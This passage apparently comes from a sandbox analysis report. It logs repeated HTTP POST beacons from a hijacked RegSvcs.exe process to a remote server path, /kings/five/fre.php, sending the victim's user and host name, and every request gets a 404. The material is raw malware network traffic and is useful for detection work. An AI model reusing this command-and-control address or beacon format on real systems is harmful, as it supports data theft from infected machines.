                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.44976194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:30.445363045 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:30.565483093 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:32.085510969 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:31 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.44976294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:32.772286892 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:32.892280102 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:34.340843916 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:34 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.44976494.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:34.614860058 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:34.734954119 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:36.018158913 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:35 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.44976694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:36.287272930 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:36.409349918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:37.879709959 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:37 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.44976794.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:38.227730036 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:38.347814083 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:39.817699909 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:39 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.44976894.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:40.077786922 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:40.197879076 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:41.706990957 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:41 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.44976994.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:41.968180895 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:42.088176966 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:43.607929945 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:43 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.44977094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:43.954031944 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:44.074153900 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:45.535087109 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:45 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.44977194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:45.805480957 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:45.927567005 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:47.435343027 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:47 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.44977294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:47.708317995 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:47.828392982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:49.348959923 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:49 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.44977394.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:49.659935951 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:49.779958963 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:51.250996113 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:51 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.44977494.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:51.515549898 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:51.635755062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:52.949302912 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:52 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.44977594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:53.224378109 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:53.344477892 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:54.623199940 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:54 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.44977694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:54.889772892 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:55.009702921 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:56.524264097 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:56 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.44977894.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:56.780823946 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:56.900865078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:52:58.371764898 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:58 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.44978094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:52:58.641870022 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:52:58.761872053 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:00.231060028 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:52:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.44978694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:00.499943018 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:00.620038986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:02.093612909 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:01 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.44979294.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:02.357311964 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:02.477302074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:04.008790970 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:03 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.44979394.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:04.281270027 CET244OUTPOST /kings/five/fre.php HTTP/1.0
